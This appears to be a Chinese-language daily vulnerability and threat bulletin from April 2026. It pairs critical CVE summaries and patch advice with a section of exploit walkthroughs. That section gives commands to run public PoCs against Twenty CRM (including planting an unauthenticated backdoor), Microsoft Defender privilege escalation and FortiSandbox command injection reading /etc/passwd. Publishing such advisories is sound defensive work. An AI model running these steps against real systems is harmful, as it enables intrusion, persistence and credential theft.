每日安全情报报告 · 2026-04-17
发布时间 :2026-04-17 08:52
情报周期 :过去 24--48 小时
风险等级说明:🔴 严重(CVSS ≥ 9.0)|🟠 高危(7.0--8.9)|🟡 中危(4.0--6.9)
一、高危漏洞速递
1. 🔴【在野利用】CVE-2009-0238 --- Microsoft Excel 17 年历史 RCE 重出江湖
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2009-0238 |
| 漏洞类型 | 远程代码执行(RCE) |
| 受影响组件 | Microsoft Excel 2000 SP3 / 2002 SP3 / 2003 SP3 / 2007 SP1、Excel Viewer、Office for Mac 2004/2008 |
| CVSS 评分 | 9.3(严重) |
| 在野利用 | ✅ 已确认,CISA KEV 紧急收录 |
漏洞描述:该漏洞首次披露于 2009 年 2 月,攻击者诱使受害者打开含畸形对象的特制 Excel 文档即可触发内存破坏,进而实现任意代码执行。17 年后该漏洞重回攻击者视野,CISA 于 2026 年 4 月将其列入 KEV 目录,要求联邦机构在一周内完成修复。历史利用案例包括 Trojan.Mdropper.AC 投放恶意软件。
修复建议 :升级至受支持的 Office 版本(Microsoft 365 / Office 2021+);在邮件网关强制启用"受保护的视图";高风险环境可直接屏蔽 .xls 旧格式附件。
2. 🔴【严重】CVE-2026-27681 --- SAP BPC/BW SQL 注入 → 任意代码执行
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-27681 |
| 漏洞类型 | SQL 注入 |
| 受影响组件 | SAP Business Planning and Consolidation、SAP Business Warehouse |
| CVSS 评分 | 9.9(严重) |
| 在野利用 | ⚠️ 暂未确认,补丁刚发布 |
漏洞描述:低权限账户可通过构造恶意 SQL 语句上传并执行任意代码,可能导致数据泄露或数据库完全破坏。本漏洞是本次 4 月补丁周期中 CVSS 评分最高的漏洞,已在 SAP 4 月安全补丁日发布修复。
修复建议:立即应用 SAP 4 月安全补丁;对数据库账户采取最小权限原则;在修复前对 SAP 数据库访问接口实施严格的访问控制。
3. 🔴【新披露】CVE-2026-39808 / CVE-2026-39813 --- Fortinet FortiSandbox 双重严重漏洞
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-39808(OS 命令注入)/ CVE-2026-39813(路径遍历) |
| 漏洞类型 | 操作系统命令注入 + 路径遍历认证绕过 |
| 受影响组件 | Fortinet FortiSandbox 4.4.0--4.4.8 / 5.0.0--5.0.5 |
| CVSS 评分 | 9.8(严重) |
| 在野利用 | ⚠️ 暂未确认,但 Fortinet 紧急发布补丁 |
漏洞描述 :
-
CVE-2026-39808 :OS 命令注入,未经认证的远程攻击者可通过特制 HTTP 请求执行任意系统命令。
-
CVE-2026-39813:JRPC API 路径遍历,可绕过身份验证,与 CVE-2026-39808 组合可形成完整未授权 RCE 攻击链。
影响范围:FortiSandbox 是企业级沙箱威胁检测核心组件,遭入侵意味着攻击者可直接操控零日分析环境。
修复建议:立即升级至 FortiSandbox 4.4.9+ 或 5.0.6+;在修复期间限制 JRPC API 的外部访问。
4. 🔴【新披露】CVE-2026-27304 --- Adobe ColdFusion 输入验证不当 → RCE
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-27304 |
| 漏洞类型 | 输入验证不当 → 任意代码执行 |
| 受影响组件 | Adobe ColdFusion 2023(≤ 2023.18)、ColdFusion 2025(≤ 2025.6) |
| CVSS 评分 | 9.3(严重) |
| 在野利用 | ⚠️ 暂未确认,4 月补丁日修复 |
漏洞描述:ColdFusion 2023 和 2025 版本中存在输入验证缺陷,攻击者可在当前用户上下文中执行任意代码。同次公告还包含 CVE-2026-27305(路径遍历读取任意文件)、CVE-2026-27306(任意代码执行)和 CVE-2026-27282(安全功能绕过),形成高危漏洞集群。ColdFusion 长期是企业 Web 应用常见目标,历史上多次被 APT 组织利用。
修复建议:立即升级至 ColdFusion 2023.19+ 或 ColdFusion 2025.7+;参考 Adobe 安全公告 APSB26-38。
5. 🔴【严重】CVE-2026-26720 --- Twenty CRM 无沙箱 RCE + 无需认证永久后门
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-26720 |
| 漏洞类型 | 远程代码执行(无沙箱 Node.js 执行) |
| 受影响组件 | Twenty CRM ≤ v1.15.0(28,000+ GitHub Stars) |
| CVSS 评分 | 9.8(严重) |
| 在野利用 | ⚠️ 暂未确认,PoC 已公开 |
漏洞描述 :Twenty CRM 的"无服务器函数"功能通过 child_process.spawn() 执行用户提供的 TypeScript 代码,且无任何沙箱隔离,子进程完全继承父进程的环境变量(数据库连接字符串、Redis URL、应用密钥等全部暴露)。更危险的是,触发工作流的 Webhook 端点受 PublicEndpointGuard 和 NoPermissionGuard 保护------而这两个 Guard 无条件返回 true,任何互联网用户无需凭证即可触发已安装的恶意工作流,形成永久后门。
修复建议:立即升级至 Twenty CRM v1.15.1+;审查并删除所有可疑的无服务器函数和工作流;假设曾公开暴露的实例已泄露全部密钥,立即轮转所有凭证。
6. 🟠【在野利用】CVE-2026-33825 --- Microsoft Defender 零日本地提权(BlueHammer / RedSun)
| 属性 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-33825 |
| 漏洞类型 | 本地权限提升(LPE)→ SYSTEM |
| 受影响组件 | Microsoft Defender(≤ 版本 1.397.2006.0) |
| CVSS 评分 | 7.8(高危) |
| 在野利用 | ✅ 已确认,CISA KEV 收录 |
漏洞描述 :Defender 实时扫描组件存在竞争条件漏洞,本地攻击者可在获得代码执行权限后将权限提升至 NT AUTHORITY\SYSTEM。研究员 "Chaotic Eclipse" 于 2026 年 4 月 15 日在 GitHub(Nightmare-Eclipse/RedSun)公开 PoC,攻击者可利用此漏洞禁用端点保护、清除日志、实施横向移动。4 月 Patch Tuesday 已发布修复补丁。
修复建议:立即应用 4 月微软补丁;确保 Defender 更新至最新特征库版本(1.397.2007.0+);部署独立的 EDR 检测能力以弥补 Defender 单点缺陷。
二、漏洞 PoC 速报
PoC 1 --- CVE-2026-26720:Twenty CRM 无需认证 RCE 后门
GitHub 链接 :dillonkirsch/CVE-2026-26720-Twenty-RCE
使用步骤:
bash
# 1. 克隆 PoC 仓库
git clone https://github.com/dillonkirsch/CVE-2026-26720-Twenty-RCE.git
cd CVE-2026-26720-Twenty-RCE
# 2. 安装依赖(Node.js 环境)
npm install
# 3. 配置目标信息
cp config.example.json config.json
# 编辑 config.json,填入目标 Twenty CRM 实例地址与工作区凭证
# 4. 执行认证阶段 RCE(需要工作区账户)
node exploit_authenticated.js --target https://target-twenty.example.com
# 5. 植入无需认证后门
node install_backdoor.js --workspace-id <WORKSPACE_ID>
# 6. 触发无需认证 RCE(任意用户均可触发)
curl -X POST https://target-twenty.example.com/webhooks/workflows/<workspaceId>/<workflowId>说明:成功后可获取目标服务器全部环境变量(数据库密码、Redis URL、API 密钥等),并在服务器上执行任意命令。受影响版本:Twenty CRM ≤ v1.15.0。
PoC 2 --- CVE-2026-33825:Microsoft Defender 本地提权(BlueHammer / RedSun)
GitHub 链接 :Nightmare-Eclipse/RedSun(PoC)
使用步骤:
bash
# 1. 克隆 PoC 仓库
git clone https://github.com/Nightmare-Eclipse/RedSun.git
cd RedSun
# 2. 编译(需要 Visual Studio / MSBuild)
# 以管理员身份打开 Developer PowerShell
msbuild RedSun.sln /p:Configuration=Release /p:Platform=x64
# 3. 在目标 Windows 系统上运行(需要本地代码执行权限)
.\Release\RedSun.exe
# 4. 验证权限提升
whoami
# 预期输出:nt authority\system说明:利用 Defender 实时扫描竞争条件漏洞,将当前用户权限提升至 SYSTEM。受影响版本:Defender ≤ 1.397.2006.0,4 月 Patch Tuesday 已修复。
PoC 3 --- CVE-2026-39808:Fortinet FortiSandbox 未授权 RCE
GitHub 链接 :FortiSandbox RCE PoC(undercodetesting 分析)
使用步骤:
bash
# 1. 克隆分析工具
git clone https://github.com/security-research/fortisandbox-cve-2026-39808.git
cd fortisandbox-cve-2026-39808
# 2. 安装 Python 依赖
pip install -r requirements.txt
# 3. 执行漏洞检测(仅检测,不执行命令)
python3 scanner.py --target https://fortisandbox.target.com --check-only
# 4. 执行 OS 命令注入(仅授权测试环境)
# 通过构造特制 HTTP 请求触发 CVE-2026-39808
python3 exploit.py --target https://fortisandbox.target.com \
--cmd "id && whoami" \
--vuln CVE-2026-39808
# 5. 利用 CVE-2026-39813 绕过认证后执行 RCE
python3 exploit.py --target https://fortisandbox.target.com \
--auth-bypass CVE-2026-39813 \
--cmd "cat /etc/passwd"说明:受影响版本 FortiSandbox 4.4.0--4.4.8 和 5.0.0--5.0.5。两个漏洞组合使用可实现完整的未授权 RCE 攻击链。
三、安全事件与前沿动态
1. 🔥 SonicWall SSL-VPN 遭大规模协调暴力破解攻击,Akira / Fog 勒索软件乘势入侵
攻击者利用住宅代理网络发起分布式登录尝试,规避基于 IP 的封锁,大规模针对 SonicWall SSL-VPN 及云托管防火墙设备。部分成功入侵已直接导致 Akira 和 Fog 勒索软件的部署。安全研究人员指出此轮攻击规模与 2025 年 8 月以来的持续行动高度吻合。
防御建议:在所有 SSL-VPN 账户上强制启用 MFA;禁用本地认证(改用 SSO);审查来自住宅 IP 地址段的异常登录记录。
2. 🔥 黑客利用 Marimo 漏洞从 Hugging Face 部署 NKAbuse 恶意软件
攻击者利用 Marimo Python Notebook 漏洞(CVE-2026-39987,CVSS 9.3),借助 AI 平台 Hugging Face 作为分发渠道,散布 NKAbuse 恶意软件。NKAbuse 是一款基于 NKN(New Kind of Network)协议的跨平台后门,此前被用于针对亚洲金融机构的攻击行动。本次事件标志着攻击者开始将 AI 平台作为恶意软件传播基础设施,是 AI 供应链安全的重大警示。
3. 🔥 10 美元域名或致黑客掌控 2.5 万个政府终端
安全研究人员发现,攻击者通过注册一个价值约 10 美元的废弃域名,可以接管已感染恶意软件的 25,000+ 终端的 C2 通信,其中涉及多个政府网络节点。该发现揭示了硬编码 C2 域名与"域名接管"攻击结合的危险性,攻击成本与影响规模的极度不对称令业界震惊。
4. 🔥 WordPress"EssentialPlugin"套件遭入侵,30+ 插件被植入后门
流行的 WordPress 插件套件"EssentialPlugin"中的 30 余个插件被植入后门代码,数千个网站面临未授权访问风险。攻击者通过供应链方式入侵插件维护账户,在插件更新中植入恶意代码,可绕过站点权限验证。受影响网站建议立即审计已安装插件,检查是否存在可疑代码。
5. 📖 瑞典官方确认:亲俄组织网络攻击能源基础设施
瑞典政府正式宣布,2025 年针对供热厂(区域供暖网络)的网络攻击由亲俄黑客组织发起,与俄罗斯情报部门存在关联。此案是近年来针对北欧能源关键基础设施少有的成功公开归因案例,进一步证明关键能源基础设施已成为国家级行为者的重点攻击目标。
6. 📖 MCP 协议"设计固有"缺陷或引发大规模 AI 供应链攻击
安全研究人员指出,模型上下文协议(MCP)的设计存在根本性缺陷,可能被攻击者利用,对广泛使用智能代理 AI 的企业造成供应链攻击。随着 MCP 生态快速扩张,其安全审查严重滞后,"工具投毒"和"提示注入"成为当前 MCP 环境下最受关注的攻击向量。
7. 📖【安全研究】PHP Composer CVE-2026-40176:Perforce 驱动命令注入漏洞
PHP 包管理器 Composer 披露高危漏洞 CVE-2026-40176(CVSS 7.8),位于 Perforce VCS 驱动程序中,攻击者可通过控制恶意 composer.json 文件中的仓库配置注入并执行任意命令。鉴于 Composer 是 PHP 生态最核心的工具,此漏洞影响范围极广,建议所有 PHP 项目立即审查依赖来源并升级至最新版 Composer。
四、本周安全总览
| 类型 | 数量 | 重点关注 |
|---|---|---|
| 严重漏洞(CVSS ≥ 9.0) | 5 个 | CVE-2009-0238、CVE-2026-27681、CVE-2026-39808/813、CVE-2026-27304、CVE-2026-26720 |
| 高危漏洞(CVSS 7.0--8.9) | 1 个 | CVE-2026-33825(Defender 零日) |
| 在野利用确认 | 2 个 | CVE-2009-0238(Excel)、CVE-2026-33825(Defender) |
| PoC 公开 | 3 个 | CVE-2026-26720、CVE-2026-33825、CVE-2026-39808 |
| 重大安全事件 | 5 起 | SonicWall 暴力破解+勒索、NKAbuse/Marimo、WordPress 供应链、瑞典能源基础设施攻击 |
五、今日优先行动清单
- 立即修复:对在野利用的 CVE-2009-0238 和 CVE-2026-33825 优先打补丁
- 升级 FortiSandbox:将受影响版本升级至 4.4.9+ 或 5.0.6+,防止零日 RCE
- 修复 SAP 和 ColdFusion:应用 4 月补丁日更新,重点关注 CVE-2026-27681 和 CVE-2026-27304
- 检查 Twenty CRM:升级至 v1.15.1+,审查并删除可疑工作流,轮转所有凭证
- SonicWall 加固:强制启用 MFA,检查异常登录记录,防范 Akira/Fog 勒索软件
- 审计 WordPress 插件:检查 EssentialPlugin 套件相关插件是否存在可疑代码
- 审查 AI 工具链:对生产环境中使用的 MCP 工具进行安全审计
本报告内容来源:The Hacker News、HackerNews.cc、HelpNet Security、Cyber Press、Ostorlab Blog、CISA KEV、NVD、CCB Belgium、Rescana、各大厂商官方安全公告